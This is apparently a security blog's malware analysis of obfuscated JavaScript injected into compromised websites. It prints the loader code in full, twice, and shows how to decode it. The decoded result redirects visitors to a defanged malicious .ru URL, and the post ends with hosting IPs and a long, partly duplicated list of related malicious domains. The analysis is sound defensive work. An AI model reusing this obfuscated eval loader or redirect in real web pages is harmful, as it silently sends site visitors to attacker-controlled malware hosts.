In this case, the code inserted into the compromised site is (I've formatted it for readability)
v="v"+"a"+"l";
try
{
faweb++
}
catch(btawetb)
{
try
{
sbgesrb+325
}
catch(btawt4)
{
w=window;
e=w["e"+v];
}
}
if(1)
{
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
}
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
j=i;
if(e&&(031==0x19))s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
if(0x10==020)try
{
gbrgbdf&236;
}
catch(asga)
{
e("if(1)"+s+"");}
try
{
faweb++
}
catch(btawetb)
{
try
{
sbgesrb+325
}
catch(btawt4)
{
w=window;
e=w["e"+v];
}
}
if(1)
{
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
}
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
j=i;
if(e&&(031==0x19))s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
if(0x10==020)try
{
gbrgbdf&236;
}
catch(asga)
{
e("if(1)"+s+"");}
To decode this, all you need to do, is modify it as follows;
v="v"+"a"+"l";
e=eval;
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
j=i;
s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
e(s);
e=eval;
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
j=i;
s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
e(s);
Which gives us (I've disabled the URL, to prevent those that have links auto-hyperlinked);
var1=49;
var2=var1;
if(var1==var2) {document.location="hxxp://onlinebayunator.ru:8080/forum/links/column.php";}
var2=var1;
if(var1==var2) {document.location="hxxp://onlinebayunator.ru:8080/forum/links/column.php";}
In this case, onlinebayunator.ru is residing at;
70.38.31.71 - AS32613 70.38.0.0/17 IWEB-AS - iWeb Technologies Inc.
202.3.245.13 - AS9471 202.3.245.0/24 MANA-PF-AP MANA S.A.
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network
Other domains known to have (most are now thankfully, dead) or are, living on the IPs include;
adventiste.pf
anapoli.ru
ashanrestaurant.ru
atp.presidence.pf
bmwforummsk.ru
croixrouge.presidence.pf
denegnashete.ru
diareuomop.ru
dimabilanch.ru
etatsgeneraux.pf
flumifrator2unix.ru
forumanarhist.ru
furnitura-forums.ru
gorysevera.ru
ioponeslal.ru
ipadvssonyx.ru
kefrikin.ru
kerneloffce.ru
kolmykiaonline.ru
leprisoruim.ru
limonadiksec.ru
mazdaontours.ru
minweb.presidence.pf
mirdymas.ru
moskow-carsharing.ru
moskowpulkavo.ru
mskoblastionline.ru
myren.net.my
mysqlfordummys.ru
offshoremskk.ru
omahabeachs.ru
onerussiaboard.ru
onlinebayunator.ru
online-cammunity.ru
online-gaminatore.ru
panalki.ru
panamamoskow.ru
penelopochka.ru
phpforkiddies.ru
porschedesignrussia.ru
porscheforumspb.ru
presid.pf
presidence.gov.pf
presidence.pf
psg.presidence.pf
pussyriotss.ru
refonte.presidence.pf
rumyniaonline.ru
sectantes-x.ru
sergikgorec.ru
soisokdomen.ru
sonatanamore.ru
spb-koalitia.ru
switched-games.ru
uzoshkins.ru
zenedin-zidane.ru
anapoli.ru
ashanrestaurant.ru
atp.presidence.pf
bmwforummsk.ru
croixrouge.presidence.pf
denegnashete.ru
diareuomop.ru
dimabilanch.ru
etatsgeneraux.pf
flumifrator2unix.ru
forumanarhist.ru
furnitura-forums.ru
gorysevera.ru
ioponeslal.ru
ipadvssonyx.ru
kefrikin.ru
kerneloffce.ru
kolmykiaonline.ru
leprisoruim.ru
limonadiksec.ru
mazdaontours.ru
minweb.presidence.pf
mirdymas.ru
moskow-carsharing.ru
moskowpulkavo.ru
mskoblastionline.ru
myren.net.my
mysqlfordummys.ru
offshoremskk.ru
omahabeachs.ru
onerussiaboard.ru
onlinebayunator.ru
online-cammunity.ru
online-gaminatore.ru
panalki.ru
panamamoskow.ru
penelopochka.ru
phpforkiddies.ru
porschedesignrussia.ru
porscheforumspb.ru
presid.pf
presidence.gov.pf
presidence.pf
psg.presidence.pf
pussyriotss.ru
refonte.presidence.pf
rumyniaonline.ru
sectantes-x.ru
sergikgorec.ru
soisokdomen.ru
sonatanamore.ru
spb-koalitia.ru
switched-games.ru
uzoshkins.ru
zenedin-zidane.ru
hpHosts, Malware Domain List, Malwarebytes AntiMalware users will be pleased to know, the IPs/domains are already blocked.
Incidentally, onlinebayunator.ru was resolving to following yesterday (1st October), and nope, I'm not surprised to see CB3ROB' IP space making an appearance either;
84.22.100.108 - mail.cyberbunker.com - AS34109 84.22.96.0/19 AS34109 CB3ROB Ltd. & Co. KG
190.10.14.196 - cb9.creationsbank.com - AS3790 190.10.0.0/17 RADIOGRAFICA COSTARRICENSE
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network
References
Malware Domain List - Malzilla
http://www.malwaredomainlist.com/forums/index.php?topic=218.0
Malzilla (open source)
http://malzilla.sourceforge.net
Posts
1 comment:
How could be infected my site by this exploit?
Post a Comment